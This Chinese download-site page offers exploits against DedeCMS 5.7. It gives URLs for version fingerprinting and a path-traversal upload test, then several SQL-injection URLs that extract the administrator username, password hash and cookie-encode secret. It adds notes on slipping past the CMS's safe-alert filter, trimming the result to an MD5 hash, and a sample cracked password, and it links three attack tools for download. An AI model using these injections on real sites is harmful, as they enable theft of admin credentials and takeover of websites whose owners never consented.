Dedecmsv5.7漏洞及工具

作者 :
免费
  • 正文
  • dede5.7 上传漏洞

    查看最后升级版本
    系统最后升级时间:http://127.0.0.1/data/admin/ver.txt
    指纹码最后同步时间:http://127.0.0.1/data/admin/verifies.txt
    上传漏洞:

    /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post

    //测试是否存在漏洞

    查看管理员用户名:
    http://localhost/member/ajax_membergroup.php?action=post&membergroup=@`’`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`’`

    查看管理员密码:
    http://localhost/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select pwd from `%23@__admin` where 1 or id=@`’`
    //这句正确
    49ba59abbe56e057 123456

    http://localhost/member/ajax_membergroup.php?action=post&membergroup=@`’`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
    //此句提示 Safe Alert: Request Error step 2!

    http://localhost/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select pwd from `%23_admin` where 1 or id=@`’`

    http://localhost/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select pwd from `%23_admin` where userid=0x61646D696E or id=@`’`
    //此句只提示修改
    //如果存在多个管理员时,可以将where 条件改为”id=1 or id=@`’` “或“userid=0x61646D696E or id=@`’` ”

    注入$cfg_cookie-encode
    http://localhost/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select value from `%23@_sysconfig` where aid=3 or aid=@`’`
    得到的是20位的,去掉前三位和最后一位,得到管理员的16位MD5

    8d2
    9b1ef9f8c5a5af42
    9

    Dedecmsv5.7漏洞及工具-完美源码

     

    更历害的工具在这哪。。

    Dedecmsv5.7漏洞及工具-完美源码

     

    Dedecmsv5.7漏洞及工具-完美源码

     

    这三款工具均是利用这个漏洞。

    软件下载地址:DedecmsFK.rar  撸大师1.7.rar  Dede一键爆密码.rar

    END
    如本资源侵犯了您的权益,请联系投诉邮箱admin@wmphp.com进行举报!我们将在收到邮件的1个小时内处理完毕。 本站仅为平台,发布的资源均为用户投稿或转载!所有资源仅供参考学习使用,请在下载后的24小时内删除,禁止商用! Wmphp.com(完美源码)助力正版,如您有自己的原创产品,可以联系客服投稿,代理出售! Wmphp.com(完美源码)客服QQ:136882447 Wmphp.com(完美源码)商务电话(仅对企业客户/个人用户):15120086569 (微信同步) 请注意:本站不提供任何免费的技术咨询服务,为了节约时间,下载前 请确认自己会技术
    完美源码 » Dedecmsv5.7漏洞及工具
    2554+

    本站勉强运行

    417+

    用户总数

    559+

    资源总数

    1+

    今日更新

    2021-9-28

    最后更新时间